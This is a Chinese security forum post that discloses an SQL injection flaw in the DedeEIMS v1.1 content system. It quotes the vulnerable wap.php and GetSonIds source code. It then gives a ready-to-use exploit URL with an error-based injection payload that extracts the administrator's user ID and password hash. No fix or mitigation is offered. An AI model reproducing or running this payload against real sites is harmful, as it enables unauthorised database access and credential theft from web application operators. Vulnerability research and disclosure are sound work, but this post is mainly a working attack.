IT技术互动交流平台

dedeeims v1.1系统漏洞sql injection

作者:Sys Shell  发布日期:2013-05-05 20:03:26
dedecms的表弟的表姨妈的女儿的未来孙子 dedeeims ..
wap.php

......
else if($action=='list')
{
        $nrow = $dsql->GetOne("Select * From `#@__arctype` where ID='$id' ");
        if($nrow['ishidden']==1) exit();
        $typename = ConvertStr($nrow['typename']);
        $typeid = $nrow['id'];
        $catcontect = '';
        $userLang = $nrow['lang'];
        if($nrow['ispart']==3)
        {
                $catcontect = html2wml($nrow['content']);
        }
        $trow = $dsql->GetOne("Select id,typename From `#@__arctype` where lang='$userLang' And  reid=0 ");
        $langname = ConvertStr($trow['typename']);
        $langid = $trow['id'];
        //当前栏目下级分类
        $dsql->SetQuery("Select ID,typename From `#@__arctype` where reID='$id' And channeltype=1 And ishidden=0 And ispart<>2 order by sortrank");
        $dsql->Execute();
        while($row=$dsql->GetObject())
        {
                $channellistnext .= "<a href='wap.php?action=list&amp;id={$row->ID}'>".ConvertStr($row->typename)."</a> ";
        }
        //栏目内容(分页输出)
        $sids = GetSonIds($id,1,true);
        $varlist = "cfg_webname,typename,channellist,channellistnext,cfg_templeturl";
        ConvertCharset($varlist);
        require_once(dirname(__FILE__)."/include/datalistcp.class.php");
        $dlist = new DataListCP();
        $dlist->SetTemplet($cfg_templets_dir."/wap/list.wml");
        $dlist->pageSize = 10;
        $dlist->SetParameter("action","list");
        $dlist->SetParameter("id",$id);
        $dlist->SetSource("Select ID,title,pubdate,click From `#@__archives` where typeid in($sids) And arcrank=0 order by ID desc"); //注入
        $dlist->Display();
        exit();
}
.......

include/channelunit.func.php

 

//获得某id的所有下级id
function GetSonIds($id,$channel=0,$addthis=true)
{
        global $_Cs;
        $GLOBALS['idArray'] = array();
        if( !is_array($_Cs) )
        {
                require_once(DEDEROOT."/data/cache/inc_catalog_base.inc");
        }
        GetSonIdsLogic($id,$_Cs,$channel,$addthis);
        $rquery = join(',',$GLOBALS['idArray']);
        return $rquery;
}

//递归逻辑
function GetSonIdsLogic($id,$sArr,$channel=0,$addthis=false)
{
        if($id!=0 && $addthis)
        {
                $GLOBALS['idArray'][$id] = $id;
        }
        foreach($sArr as $k=>$v)
        {
                if( $v[0]==$id && ($channel==0 || $v[1]==$channel ))
                {
                        GetSonIdsLogic($k,$sArr,$channel,true);
                }
        }
}

exp
 http://www.it165.net /DedeEIMS_1.1/wap.php?action=list&id=1 or @`'`=1 and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a from information_schema.tables group by a)b) and @`'`=0
 


 

 

延伸阅读:

Tag标签: dedeeims  
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规